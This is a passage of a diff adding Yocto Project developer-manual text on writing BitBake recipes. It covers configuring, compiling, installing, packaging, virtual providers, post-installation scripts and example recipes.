+ :ref:`cmake <ref-classes-cmake>` class and your
+ recipe does not have to contain a
+ :ref:`ref-tasks-configure` task.
+ You can make some adjustments by setting
+ :term:`EXTRA_OECMAKE` to
+ pass any needed configure options that are specific to the recipe.
+
+ .. note::
+
+ If you need to install one or more custom CMake toolchain files
+ that are supplied by the application you are building, install the
+ files to ``${D}${datadir}/cmake/Modules`` during ``do_install``.
+
+- *Other:* If your source files do not have a ``configure.ac`` or
+ ``CMakeLists.txt`` file, then your software is built using some
+ method other than Autotools or CMake. If this is the case, you
+ normally need to provide a
+ :ref:`ref-tasks-configure` task
+ in your recipe unless, of course, there is nothing to configure.
+
+ Even if your software is not being built by Autotools or CMake, you
+ still might not need to deal with any configuration issues. You need
+ to determine if configuration is even a required step. You might need
+ to modify a Makefile or some configuration file used for the build to
+ specify necessary build options. Or, perhaps you might need to run a
+ provided, custom configure script with the appropriate options.
+
+ For the case involving a custom configure script, you would run
+ ``./configure --help`` and look for the options you need to set.
+
+Once configuration succeeds, it is always good practice to look at the
+``log.do_configure`` file to ensure that the appropriate options have
+been enabled and no additional build-time dependencies need to be added
+to ``DEPENDS``. For example, if the configure script reports that it
+found something not mentioned in ``DEPENDS``, or that it did not find
+something that it needed for some desired optional functionality, then
+you would need to add those to ``DEPENDS``. Looking at the log might
+also reveal items being checked for, enabled, or both that you do not
+want, or items not being found that are in ``DEPENDS``, in which case
+you would need to look at passing extra options to the configure script
+as needed. For reference information on configure options specific to
+the software you are building, you can consult the output of the
+``./configure --help`` command within ``${S}`` or consult the software's
+upstream documentation.
+
+.. _new-recipe-using-headers-to-interface-with-devices:
+
+Using Headers to Interface with Devices
+---------------------------------------
+
+If your recipe builds an application that needs to communicate with some
+device or needs an API into a custom kernel, you will need to provide
+appropriate header files. Under no circumstances should you ever modify
+the existing
+``meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc`` file.
+These headers are used to build ``libc`` and must not be compromised
+with custom or machine-specific header information. If you customize
+``libc`` through modified headers all other applications that use
+``libc`` thus become affected.
+
+.. note::
+
+ Never copy and customize the ``libc`` header file (i.e.
+ ``meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc``).
+
+The correct way to interface to a device or custom kernel is to use a
+separate package that provides the additional headers for the driver or
+other unique interfaces. When doing so, your application also becomes
+responsible for creating a dependency on that specific provider.
+
+Consider the following:
+
+- Never modify ``linux-libc-headers.inc``. Consider that file to be
+ part of the ``libc`` system, and not something you use to access the
+ kernel directly. You should access ``libc`` through specific ``libc``
+ calls.
+
+- Applications that must talk directly to devices should either provide
+ necessary headers themselves, or establish a dependency on a special
+ headers package that is specific to that driver.
+
+For example, suppose you want to modify an existing header that adds I/O
+control or network support. If the modifications are used by a small
+number programs, providing a unique version of a header is easy and has
+little impact. When doing so, bear in mind the guidelines in the
+previous list.
+
+.. note::
+
+ If for some reason your changes need to modify the behavior of the ``libc``,
+ and subsequently all other applications on the system, use a ``.bbappend``
+ to modify the ``linux-kernel-headers.inc`` file. However, take care to not
+ make the changes machine specific.
+
+Consider a case where your kernel is older and you need an older
+``libc`` ABI. The headers installed by your recipe should still be a
+standard mainline kernel, not your own custom one.
+
+When you use custom kernel headers you need to get them from
+:term:`STAGING_KERNEL_DIR`,
+which is the directory with kernel headers that are required to build
+out-of-tree modules. Your recipe will also need the following:
+::
+
+ do_configure[depends] += "virtual/kernel:do_shared_workdir"
+
+.. _new-recipe-compilation:
+
+Compilation
+-----------
+
+During a build, the ``do_compile`` task happens after source is fetched,
+unpacked, and configured. If the recipe passes through ``do_compile``
+successfully, nothing needs to be done.
+
+However, if the compile step fails, you need to diagnose the failure.
+Here are some common issues that cause failures.
+
+.. note::
+
+ For cases where improper paths are detected for configuration files
+ or for when libraries/headers cannot be found, be sure you are using
+ the more robust ``pkg-config``. See the note in section
+ ":ref:`new-recipe-configuring-the-recipe`" for additional information.
+
+- *Parallel build failures:* These failures manifest themselves as
+ intermittent errors, or errors reporting that a file or directory
+ that should be created by some other part of the build process could
+ not be found. This type of failure can occur even if, upon
+ inspection, the file or directory does exist after the build has
+ failed, because that part of the build process happened in the wrong
+ order.
+
+ To fix the problem, you need to either satisfy the missing dependency
+ in the Makefile or whatever script produced the Makefile, or (as a
+ workaround) set :term:`PARALLEL_MAKE` to an empty string:
+ ::
+
+ PARALLEL_MAKE = ""
+
+ For information on parallel Makefile issues, see the "`Debugging
+ Parallel Make Races <#debugging-parallel-make-races>`__" section.
+
+- *Improper host path usage:* This failure applies to recipes building
+ for the target or ``nativesdk`` only. The failure occurs when the
+ compilation process uses improper headers, libraries, or other files
+ from the host system when cross-compiling for the target.
+
+ To fix the problem, examine the ``log.do_compile`` file to identify
+ the host paths being used (e.g. ``/usr/include``, ``/usr/lib``, and
+ so forth) and then either add configure options, apply a patch, or do
+ both.
+
+- *Failure to find required libraries/headers:* If a build-time
+ dependency is missing because it has not been declared in
+ :term:`DEPENDS`, or because the
+ dependency exists but the path used by the build process to find the
+ file is incorrect and the configure step did not detect it, the
+ compilation process could fail. For either of these failures, the
+ compilation process notes that files could not be found. In these
+ cases, you need to go back and add additional options to the
+ configure script as well as possibly add additional build-time
+ dependencies to ``DEPENDS``.
+
+ Occasionally, it is necessary to apply a patch to the source to
+ ensure the correct paths are used. If you need to specify paths to
+ find files staged into the sysroot from other recipes, use the
+ variables that the OpenEmbedded build system provides (e.g.
+ ``STAGING_BINDIR``, ``STAGING_INCDIR``, ``STAGING_DATADIR``, and so
+ forth).
+
+.. _new-recipe-installing:
+
+Installing
+----------
+
+During ``do_install``, the task copies the built files along with their
+hierarchy to locations that would mirror their locations on the target
+device. The installation process copies files from the
+``${``\ :term:`S`\ ``}``,
+``${``\ :term:`B`\ ``}``, and
+``${``\ :term:`WORKDIR`\ ``}``
+directories to the ``${``\ :term:`D`\ ``}``
+directory to create the structure as it should appear on the target
+system.
+
+How your software is built affects what you must do to be sure your
+software is installed correctly. The following list describes what you
+must do for installation depending on the type of build system used by
+the software being built:
+
+- *Autotools and CMake:* If the software your recipe is building uses
+ Autotools or CMake, the OpenEmbedded build system understands how to
+ install the software. Consequently, you do not have to have a
+ ``do_install`` task as part of your recipe. You just need to make
+ sure the install portion of the build completes with no issues.
+ However, if you wish to install additional files not already being
+ installed by ``make install``, you should do this using a
+ ``do_install_append`` function using the install command as described
+ in the "Manual" bulleted item later in this list.
+
+- *Other (using* ``make install``\ *)*: You need to define a ``do_install``
+ function in your recipe. The function should call
+ ``oe_runmake install`` and will likely need to pass in the
+ destination directory as well. How you pass that path is dependent on
+ how the ``Makefile`` being run is written (e.g. ``DESTDIR=${D}``,
+ ``PREFIX=${D}``, ``INSTALLROOT=${D}``, and so forth).
+
+ For an example recipe using ``make install``, see the
+ "`Makefile-Based Package <#new-recipe-makefile-based-package>`__"
+ section.
+
+- *Manual:* You need to define a ``do_install`` function in your
+ recipe. The function must first use ``install -d`` to create the
+ directories under
+ ``${``\ :term:`D`\ ``}``. Once the
+ directories exist, your function can use ``install`` to manually
+ install the built software into the directories.
+
+ You can find more information on ``install`` at
+ https://www.gnu.org/software/coreutils/manual/html_node/install-invocation.html.
+
+For the scenarios that do not use Autotools or CMake, you need to track
+the installation and diagnose and fix any issues until everything
+installs correctly. You need to look in the default location of
+``${D}``, which is ``${WORKDIR}/image``, to be sure your files have been
+installed correctly.
+
+.. note::
+
+ - During the installation process, you might need to modify some of
+ the installed files to suit the target layout. For example, you
+ might need to replace hard-coded paths in an initscript with
+ values of variables provided by the build system, such as
+ replacing ``/usr/bin/`` with ``${bindir}``. If you do perform such
+ modifications during ``do_install``, be sure to modify the
+ destination file after copying rather than before copying.
+ Modifying after copying ensures that the build system can
+ re-execute ``do_install`` if needed.
+
+ - ``oe_runmake install``, which can be run directly or can be run
+ indirectly by the
+ :ref:`autotools <ref-classes-autotools>` and
+ :ref:`cmake <ref-classes-cmake>` classes,
+ runs ``make install`` in parallel. Sometimes, a Makefile can have
+ missing dependencies between targets that can result in race
+ conditions. If you experience intermittent failures during
+ ``do_install``, you might be able to work around them by disabling
+ parallel Makefile installs by adding the following to the recipe:
+ ::
+
+ PARALLEL_MAKEINST = ""
+
+ See :term:`PARALLEL_MAKEINST` for additional information.
+
+ - If you need to install one or more custom CMake toolchain files
+ that are supplied by the application you are building, install the
+ files to ``${D}${datadir}/cmake/Modules`` during
+ :ref:`ref-tasks-install`.
+
+.. _new-recipe-enabling-system-services:
+
+Enabling System Services
+------------------------
+
+If you want to install a service, which is a process that usually starts
+on boot and runs in the background, then you must include some
+additional definitions in your recipe.
+
+If you are adding services and the service initialization script or the
+service file itself is not installed, you must provide for that
+installation in your recipe using a ``do_install_append`` function. If
+your recipe already has a ``do_install`` function, update the function
+near its end rather than adding an additional ``do_install_append``
+function.
+
+When you create the installation for your services, you need to
+accomplish what is normally done by ``make install``. In other words,
+make sure your installation arranges the output similar to how it is
+arranged on the target system.
+
+The OpenEmbedded build system provides support for starting services two
+different ways:
+
+- *SysVinit:* SysVinit is a system and service manager that manages the
+ init system used to control the very basic functions of your system.
+ The init program is the first program started by the Linux kernel
+ when the system boots. Init then controls the startup, running and
+ shutdown of all other programs.
+
+ To enable a service using SysVinit, your recipe needs to inherit the
+ :ref:`update-rc.d <ref-classes-update-rc.d>`
+ class. The class helps facilitate safely installing the package on
+ the target.
+
+ You will need to set the
+ :term:`INITSCRIPT_PACKAGES`,
+ :term:`INITSCRIPT_NAME`,
+ and
+ :term:`INITSCRIPT_PARAMS`
+ variables within your recipe.
+
+- *systemd:* System Management Daemon (systemd) was designed to replace
+ SysVinit and to provide enhanced management of services. For more
+ information on systemd, see the systemd homepage at
+ https://freedesktop.org/wiki/Software/systemd/.
+
+ To enable a service using systemd, your recipe needs to inherit the
+ :ref:`systemd <ref-classes-systemd>` class. See
+ the ``systemd.bbclass`` file located in your :term:`Source Directory`
+ section for
+ more information.
+
+.. _new-recipe-packaging:
+
+Packaging
+---------
+
+Successful packaging is a combination of automated processes performed
+by the OpenEmbedded build system and some specific steps you need to
+take. The following list describes the process:
+
+- *Splitting Files*: The ``do_package`` task splits the files produced
+ by the recipe into logical components. Even software that produces a
+ single binary might still have debug symbols, documentation, and
+ other logical components that should be split out. The ``do_package``
+ task ensures that files are split up and packaged correctly.
+
+- *Running QA Checks*: The
+ :ref:`insane <ref-classes-insane>` class adds a
+ step to the package generation process so that output quality
+ assurance checks are generated by the OpenEmbedded build system. This
+ step performs a range of checks to be sure the build's output is free
+ of common problems that show up during runtime. For information on
+ these checks, see the
+ :ref:`insane <ref-classes-insane>` class and
+ the ":ref:`ref-manual/ref-qa-checks:qa error and warning messages`"
+ chapter in the Yocto Project Reference Manual.
+
+- *Hand-Checking Your Packages*: After you build your software, you
+ need to be sure your packages are correct. Examine the
+ ``${``\ :term:`WORKDIR`\ ``}/packages-split``
+ directory and make sure files are where you expect them to be. If you
+ discover problems, you can set
+ :term:`PACKAGES`,
+ :term:`FILES`,
+ ``do_install(_append)``, and so forth as needed.
+
+- *Splitting an Application into Multiple Packages*: If you need to
+ split an application into several packages, see the "`Splitting an
+ Application into Multiple
+ Packages <#splitting-an-application-into-multiple-packages>`__"
+ section for an example.
+
+- *Installing a Post-Installation Script*: For an example showing how
+ to install a post-installation script, see the "`Post-Installation
+ Scripts <#new-recipe-post-installation-scripts>`__" section.
+
+- *Marking Package Architecture*: Depending on what your recipe is
+ building and how it is configured, it might be important to mark the
+ packages produced as being specific to a particular machine, or to
+ mark them as not being specific to a particular machine or
+ architecture at all.
+
+ By default, packages apply to any machine with the same architecture
+ as the target machine. When a recipe produces packages that are
+ machine-specific (e.g. the
+ :term:`MACHINE` value is passed
+ into the configure script or a patch is applied only for a particular
+ machine), you should mark them as such by adding the following to the
+ recipe:
+ ::
+
+ PACKAGE_ARCH = "${MACHINE_ARCH}"
+
+ On the other hand, if the recipe produces packages that do not
+ contain anything specific to the target machine or architecture at
+ all (e.g. recipes that simply package script files or configuration
+ files), you should use the
+ :ref:`allarch <ref-classes-allarch>` class to
+ do this for you by adding this to your recipe:
+ ::
+
+ inherit allarch
+
+ Ensuring that the package architecture is correct is not critical
+ while you are doing the first few builds of your recipe. However, it
+ is important in order to ensure that your recipe rebuilds (or does
+ not rebuild) appropriately in response to changes in configuration,
+ and to ensure that you get the appropriate packages installed on the
+ target machine, particularly if you run separate builds for more than
+ one target machine.
+
+.. _new-sharing-files-between-recipes:
+
+Sharing Files Between Recipes
+-----------------------------
+
+Recipes often need to use files provided by other recipes on the build
+host. For example, an application linking to a common library needs
+access to the library itself and its associated headers. The way this
+access is accomplished is by populating a sysroot with files. Each
+recipe has two sysroots in its work directory, one for target files
+(``recipe-sysroot``) and one for files that are native to the build host
+(``recipe-sysroot-native``).
+
+.. note::
+
+ You could find the term "staging" used within the Yocto project
+ regarding files populating sysroots (e.g. the :term:`STAGING_DIR`
+ variable).
+
+Recipes should never populate the sysroot directly (i.e. write files
+into sysroot). Instead, files should be installed into standard
+locations during the
+:ref:`ref-tasks-install` task within
+the ``${``\ :term:`D`\ ``}`` directory. The
+reason for this limitation is that almost all files that populate the
+sysroot are cataloged in manifests in order to ensure the files can be
+removed later when a recipe is either modified or removed. Thus, the
+sysroot is able to remain free from stale files.
+
+A subset of the files installed by the
+:ref:`ref-tasks-install` task are
+used by the
+:ref:`ref-tasks-populate_sysroot`
+task as defined by the the
+:term:`SYSROOT_DIRS` variable to
+automatically populate the sysroot. It is possible to modify the list of
+directories that populate the sysroot. The following example shows how
+you could add the ``/opt`` directory to the list of directories within a
+recipe:
+::
+
+ SYSROOT_DIRS += "/opt"
+
+For a more complete description of the
+:ref:`ref-tasks-populate_sysroot`
+task and its associated functions, see the
+:ref:`staging <ref-classes-staging>` class.
+
+.. _metadata-virtual-providers:
+
+Using Virtual Providers
+-----------------------
+
+Prior to a build, if you know that several different recipes provide the
+same functionality, you can use a virtual provider (i.e. ``virtual/*``)
+as a placeholder for the actual provider. The actual provider is
+determined at build-time.
+
+A common scenario where a virtual provider is used would be for the
+kernel recipe. Suppose you have three kernel recipes whose
+:term:`PN` values map to ``kernel-big``,
+``kernel-mid``, and ``kernel-small``. Furthermore, each of these recipes
+in some way uses a :term:`PROVIDES`
+statement that essentially identifies itself as being able to provide
+``virtual/kernel``. Here is one way through the
+:ref:`kernel <ref-classes-kernel>` class:
+::
+
+ PROVIDES += "${@ "virtual/kernel" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else "" }"
+
+Any recipe that inherits the ``kernel`` class is
+going to utilize a ``PROVIDES`` statement that identifies that recipe as
+being able to provide the ``virtual/kernel`` item.
+
+Now comes the time to actually build an image and you need a kernel
+recipe, but which one? You can configure your build to call out the
+kernel recipe you want by using the
+:term:`PREFERRED_PROVIDER`
+variable. As an example, consider the
+:yocto_git:`x86-base.inc </cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc>`
+include file, which is a machine (i.e.
+:term:`MACHINE`) configuration file.
+This include file is the reason all x86-based machines use the
+``linux-yocto`` kernel. Here are the relevant lines from the include
+file:
+::
+
+ PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
+ PREFERRED_VERSION_linux-yocto ??= "4.15%"
+
+When you use a virtual provider, you do not have to "hard code" a recipe
+name as a build dependency. You can use the
+:term:`DEPENDS` variable to state the
+build is dependent on ``virtual/kernel`` for example:
+::
+
+ DEPENDS = "virtual/kernel"
+
+During the build, the OpenEmbedded build system picks
+the correct recipe needed for the ``virtual/kernel`` dependency based on
+the ``PREFERRED_PROVIDER`` variable. If you want to use the small kernel
+mentioned at the beginning of this section, configure your build as
+follows:
+::
+
+ PREFERRED_PROVIDER_virtual/kernel ??= "kernel-small"
+
+.. note::
+
+ Any recipe that ``PROVIDES`` a ``virtual/*`` item that is ultimately not
+ selected through ``PREFERRED_PROVIDER`` does not get built. Preventing these
+ recipes from building is usually the desired behavior since this mechanism's
+ purpose is to select between mutually exclusive alternative providers.
+
+The following lists specific examples of virtual providers:
+
+- ``virtual/kernel``: Provides the name of the kernel recipe to use
+ when building a kernel image.
+
+- ``virtual/bootloader``: Provides the name of the bootloader to use
+ when building an image.
+
+- ``virtual/libgbm``: Provides ``gbm.pc``.
+
+- ``virtual/egl``: Provides ``egl.pc`` and possibly ``wayland-egl.pc``.
+
+- ``virtual/libgl``: Provides ``gl.pc`` (i.e. libGL).
+
+- ``virtual/libgles1``: Provides ``glesv1_cm.pc`` (i.e. libGLESv1_CM).
+
+- ``virtual/libgles2``: Provides ``glesv2.pc`` (i.e. libGLESv2).
+
+.. note::
+
+ Virtual providers only apply to build time dependencies specified with
+ :term:`PROVIDES` and :term:`DEPENDS`. They do not apply to runtime
+ dependencies specified with :term:`RPROVIDES` and :term:`RDEPENDS`.
+
+Properly Versioning Pre-Release Recipes
+---------------------------------------
+
+Sometimes the name of a recipe can lead to versioning problems when the
+recipe is upgraded to a final release. For example, consider the
+``irssi_0.8.16-rc1.bb`` recipe file in the list of example recipes in
+the "`Storing and Naming the
+Recipe <#new-recipe-storing-and-naming-the-recipe>`__" section. This
+recipe is at a release candidate stage (i.e. "rc1"). When the recipe is
+released, the recipe filename becomes ``irssi_0.8.16.bb``. The version
+change from ``0.8.16-rc1`` to ``0.8.16`` is seen as a decrease by the
+build system and package managers, so the resulting packages will not
+correctly trigger an upgrade.
+
+In order to ensure the versions compare properly, the recommended
+convention is to set :term:`PV` within the
+recipe to "previous_version+current_version". You can use an additional
+variable so that you can use the current version elsewhere. Here is an
+example:
+::
+
+ REALPV = "0.8.16-rc1"
+ PV = "0.8.15+${REALPV}"
+
+.. _new-recipe-post-installation-scripts:
+
+Post-Installation Scripts
+-------------------------
+
+Post-installation scripts run immediately after installing a package on
+the target or during image creation when a package is included in an
+image. To add a post-installation script to a package, add a
+``pkg_postinst_``\ `PACKAGENAME`\ ``()`` function to the recipe file
+(``.bb``) and replace `PACKAGENAME` with the name of the package you want
+to attach to the ``postinst`` script. To apply the post-installation
+script to the main package for the recipe, which is usually what is
+required, specify
+``${``\ :term:`PN`\ ``}`` in place of
+PACKAGENAME.
+
+A post-installation function has the following structure:
+::
+
+ pkg_postinst_PACKAGENAME() {
+ # Commands to carry out
+ }
+
+The script defined in the post-installation function is called when the
+root filesystem is created. If the script succeeds, the package is
+marked as installed.
+
+.. note::
+
+ Any RPM post-installation script that runs on the target should
+ return a 0 exit code. RPM does not allow non-zero exit codes for
+ these scripts, and the RPM package manager will cause the package to
+ fail installation on the target.
+
+Sometimes it is necessary for the execution of a post-installation
+script to be delayed until the first boot. For example, the script might
+need to be executed on the device itself. To delay script execution
+until boot time, you must explicitly mark post installs to defer to the
+target. You can use ``pkg_postinst_ontarget()`` or call
+``postinst_intercept delay_to_first_boot`` from ``pkg_postinst()``. Any
+failure of a ``pkg_postinst()`` script (including exit 1) triggers an
+error during the
+:ref:`ref-tasks-rootfs` task.
+
+If you have recipes that use ``pkg_postinst`` function and they require
+the use of non-standard native tools that have dependencies during
+rootfs construction, you need to use the
+:term:`PACKAGE_WRITE_DEPS`
+variable in your recipe to list these tools. If you do not use this
+variable, the tools might be missing and execution of the
+post-installation script is deferred until first boot. Deferring the
+script to first boot is undesirable and for read-only rootfs impossible.
+
+.. note::
+
+ Equivalent support for pre-install, pre-uninstall, and post-uninstall
+ scripts exist by way of ``pkg_preinst``, ``pkg_prerm``, and ``pkg_postrm``,
+ respectively. These scrips work in exactly the same way as does
+ ``pkg_postinst`` with the exception that they run at different times. Also,
+ because of when they run, they are not applicable to being run at image
+ creation time like ``pkg_postinst``.
+
+.. _new-recipe-testing:
+
+Testing
+-------
+
+The final step for completing your recipe is to be sure that the
+software you built runs correctly. To accomplish runtime testing, add
+the build's output packages to your image and test them on the target.
+
+For information on how to customize your image by adding specific
+packages, see the "`Customizing
+Images <#usingpoky-extend-customimage>`__" section.
+
+.. _new-recipe-testing-examples:
+
+Examples
+--------
+
+To help summarize how to write a recipe, this section provides some
+examples given various scenarios:
+
+- Recipes that use local files
+
+- Using an Autotooled package
+
+- Using a Makefile-based package
+
+- Splitting an application into multiple packages
+
+- Adding binaries to an image
+
+.. _new-recipe-single-c-file-package-hello-world:
+
+Single .c File Package (Hello World!)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Building an application from a single file that is stored locally (e.g.
+under ``files``) requires a recipe that has the file listed in the
+``SRC_URI`` variable. Additionally, you need to manually write the
+``do_compile`` and ``do_install`` tasks. The ``S`` variable defines the
+directory containing the source code, which is set to
+:term:`WORKDIR` in this case - the
+directory BitBake uses for the build.
+::
+
+ SUMMARY = "Simple helloworld application"
+ SECTION = "examples"
+ LICENSE = "MIT"
+ LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
+
+ SRC_URI = "file://helloworld.c"
+
+ S = "${WORKDIR}"
+
+ do_compile() {
+ ${CC} helloworld.c -o helloworld
+ }
+
+ do_install() {
+ install -d ${D}${bindir}
+ install -m 0755 helloworld ${D}${bindir}
+ }
+
+By default, the ``helloworld``, ``helloworld-dbg``, and
+``helloworld-dev`` packages are built. For information on how to
+customize the packaging process, see the "`Splitting an Application into
+Multiple Packages <#splitting-an-application-into-multiple-packages>`__"
+section.
+
+.. _new-recipe-autotooled-package:
+
+Autotooled Package
+~~~~~~~~~~~~~~~~~~
+
+Applications that use Autotools such as ``autoconf`` and ``automake``
+require a recipe that has a source archive listed in ``SRC_URI`` and
+also inherit the
+:ref:`autotools <ref-classes-autotools>` class,
+which contains the definitions of all the steps needed to build an
+Autotool-based application. The result of the build is automatically
+packaged. And, if the application uses NLS for localization, packages
+with local information are generated (one package per language).
+Following is one example: (``hello_2.3.bb``)
+::
+
+ SUMMARY = "GNU Helloworld application"
+ SECTION = "examples"
+ LICENSE = "GPLv2+"
+ LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
+
+ SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.gz"
+
+ inherit autotools gettext
+
+The variable ``LIC_FILES_CHKSUM`` is used to track source license
+changes as described in the
+":ref:`dev-manual/dev-manual-common-tasks:tracking license changes`" section in
+the Yocto Project Overview and Concepts Manual. You can quickly create
+Autotool-based recipes in a manner similar to the previous example.
+
+.. _new-recipe-makefile-based-package:
+
+Makefile-Based Package
+~~~~~~~~~~~~~~~~~~~~~~
+
+Applications that use GNU ``make`` also require a recipe that has the
+source archive listed in ``SRC_URI``. You do not need to add a
+``do_compile`` step since by default BitBake starts the ``make`` command
+to compile the application. If you need additional ``make`` options, you
+should store them in the
+:term:`EXTRA_OEMAKE` or
+:term:`PACKAGECONFIG_CONFARGS`
+variables. BitBake passes these options into the GNU ``make``
+invocation. Note that a ``do_install`` task is still required.
+Otherwise, BitBake runs an empty ``do_install`` task by default.
+
+Some applications might require extra parameters to be passed to the
+compiler. For example, the application might need an additional header
+path. You can accomplish this by adding to the ``CFLAGS`` variable. The
+following example shows this:
+::
+
+ CFLAGS_prepend = "-I ${S}/include "
+
+In the following example, ``mtd-utils`` is a makefile-based package:
+::
+
+ SUMMARY = "Tools for managing memory technology devices"
+ SECTION = "base"
+ DEPENDS = "zlib lzo e2fsprogs util-linux"
+ HOMEPAGE = "http://www.linux-mtd.infradead.org/"
+ LICENSE = "GPLv2+"
+ LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
+ file://include/common.h;beginline=1;endline=17;md5=ba05b07912a44ea2bf81ce409380049c"
+
+ # Use the latest version at 26 Oct, 2013
+ SRCREV = "9f107132a6a073cce37434ca9cda6917dd8d866b"
+ SRC_URI = "git://git.infradead.org/mtd-utils.git \
+ file://add-exclusion-to-mkfs-jffs2-git-2.patch \
+ "
+
+ PV = "1.5.1+git${SRCPV}"
+
+ S = "${WORKDIR}/git"
+
+ EXTRA_OEMAKE = "'CC=${CC}' 'RANLIB=${RANLIB}' 'AR=${AR}' 'CFLAGS=${CFLAGS} -I${S}/include -DWITHOUT_XATTR' 'BUILDDIR=${S}'"
+
+ do_install () {
+ oe_runmake install DESTDIR=${D} SBINDIR=${sbindir} MANDIR=${mandir} INCLUDEDIR=${includedir}
+ }
+
+ PACKAGES =+ "mtd-utils-jffs2 mtd-utils-ubifs mtd-utils-misc"
+
+ FILES_mtd-utils-jffs2 = "${sbindir}/mkfs.jffs2 ${sbindir}/jffs2dump ${sbindir}/jffs2reader ${sbindir}/sumtool"
+ FILES_mtd-utils-ubifs = "${sbindir}/mkfs.ubifs ${sbindir}/ubi*"
+ FILES_mtd-utils-misc = "${sbindir}/nftl* ${sbindir}/ftl* ${sbindir}/rfd* ${sbindir}/doc* ${sbindir}/serve_image ${sbindir}/recv_image"
+
+ PARALLEL_MAKE = ""
+
+ BBCLASSEXTEND = "native"
+
+Splitting an Application into Multiple Packages
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can use the variables ``PACKAGES`` and ``FILES`` to split an
+application into multiple packages.
+
+Following is an example that uses the ``libxpm`` recipe. By default,
+this recipe generates a single package that contains the library along
+with a few binaries. You can modify the recipe to split the binaries
+into separate packages:
+::
+
+ require xorg-lib-common.inc
+
+ SUMMARY = "Xpm: X Pixmap extension library"
+ LICENSE = "BSD"
+ LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
+ DEPENDS += "libxext libsm libxt"
+ PE = "1"
+
+ XORG_PN = "libXpm"
+
+ PACKAGES =+ "sxpm cxpm"
+ FILES_cxpm = "${bindir}/cxpm"
+ FILES_sxpm = "${bindir}/sxpm"
+
+In the previous example, we want to ship the ``sxpm`` and ``cxpm``
+binaries in separate packages. Since ``bindir`` would be packaged into
+the main ``PN`` package by default, we prepend the ``PACKAGES`` variable
+so additional package names are added to the start of list. This results
+in the extra ``FILES_*`` variables then containing information that
+define which files and directories go into which packages. Files
+included by earlier packages are skipped by latter packages. Thus, the
+main ``PN`` package does not include the above listed files.
+
+Packaging Externally Produced Binaries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Sometimes, you need to add pre-compiled binaries to an image. For
+example, suppose that binaries for proprietary code exist, which are
+created by a particular division of a company. Your part of the company
+needs to use those binaries as part of an image that you are building
+using the OpenEmbedded build system. Since you only have the binaries
+and not the source code, you cannot use a typical recipe that expects to
+fetch the source specified in
+:term:`SRC_URI` and then compile it.
+
+One method is to package the binaries and then install them as part of
+the image. Generally, it is not a good idea to package binaries since,
+among other things, it can hinder the ability to reproduce builds and
+could lead to compatibility problems with ABI in the future. However,
+sometimes you have no choice.
+
+The easiest solution is to create a recipe that uses the
+:ref:`bin_package <ref-classes-bin-package>` class
+and to be sure that you are using default locations for build artifacts.
+In most cases, the ``bin_package`` class handles "skipping" the
+configure and compile steps as well as sets things up to grab packages
+from the appropriate area. In particular, this class sets ``noexec`` on
+both the :ref:`ref-tasks-configure`
+and :ref:`ref-tasks-compile` tasks,
+sets ``FILES_${PN}`` to "/" so that it picks up all files, and sets up a
+:ref:`ref-tasks-install` task, which
+effectively copies all files from ``${S}`` to ``${D}``. The
+``bin_package`` class works well when the files extracted into ``${S}``
+are already laid out in the way they should be laid out on the target.
+For more information on these variables, see the
+:term:`FILES`,
+:term:`PN`,
+:term:`S`, and
+:term:`D` variables in the Yocto Project
+Reference Manual's variable glossary.
+
+.. note::
+
+ - Using :term:`DEPENDS` is a good
+ idea even for components distributed in binary form, and is often
+ necessary for shared libraries. For a shared library, listing the
+ library dependencies in ``DEPENDS`` makes sure that the libraries
+ are available in the staging sysroot when other recipes link
+ against the library, which might be necessary for successful
+ linking.
+
+ - Using ``DEPENDS`` also allows runtime dependencies between
+ packages to be added automatically. See the
+ ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+ section in the Yocto Project Overview and Concepts Manual for more
+ information.
+
+If you cannot use the ``bin_package`` class, you need to be sure you are
+doing the following:
+
+- Create a recipe where the
+ :ref:`ref-tasks-configure` and
+ :ref:`ref-tasks-compile` tasks do
+ nothing: It is usually sufficient to just not define these tasks in
+ the recipe, because the default implementations do nothing unless a
+ Makefile is found in
+ ``${``\ :term:`S`\ ``}``.
+
+ If ``${S}`` might contain a Makefile, or if you inherit some class
+ that replaces ``do_configure`` and ``do_compile`` with custom
+ versions, then you can use the
+ ``[``\ :ref:`noexec <bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]``
+ flag to turn the tasks into no-ops, as follows:
+ ::
+
+ do_configure[noexec] = "1"
+ do_compile[noexec] = "1"
+
+ Unlike
+ :ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:deleting a task`,
+ using the flag preserves the dependency chain from the
+ :ref:`ref-tasks-fetch`,
+ :ref:`ref-tasks-unpack`, and
+ :ref:`ref-tasks-patch` tasks to the
+ :ref:`ref-tasks-install` task.
+
+- Make sure your ``do_install`` task installs the binaries
+ appropriately.
+
+- Ensure that you set up :term:`FILES`
+ (usually
+ ``FILES_${``\ :term:`PN`\ ``}``) to
+ point to the files you have installed, which of course depends on
+ where you have installed them and whether those files are in
+ different locations than the defaults.
+
+.. note::
+
+ If image prelinking is enabled (e.g. "image-prelink" is in :term:`USER_CLASSES`
+ which it is by default), prelink will change the binaries in the generated images
+ and this often catches people out. Remove that class to ensure binaries are
+ preserved exactly if that is necessary.
+
+Following Recipe Style Guidelines
+---------------------------------
+
+When writing recipes, it is good to conform to existing style
+guidelines. The :oe_home:`OpenEmbedded Styleguide </wiki/Styleguide>` wiki page
+provides rough guidelines for preferred recipe style.
+
+It is common for existing recipes to deviate a bit from this style.
+However, aiming for at least a consistent style is a good idea. Some
+practices, such as omitting spaces around ``=`` operators in assignments
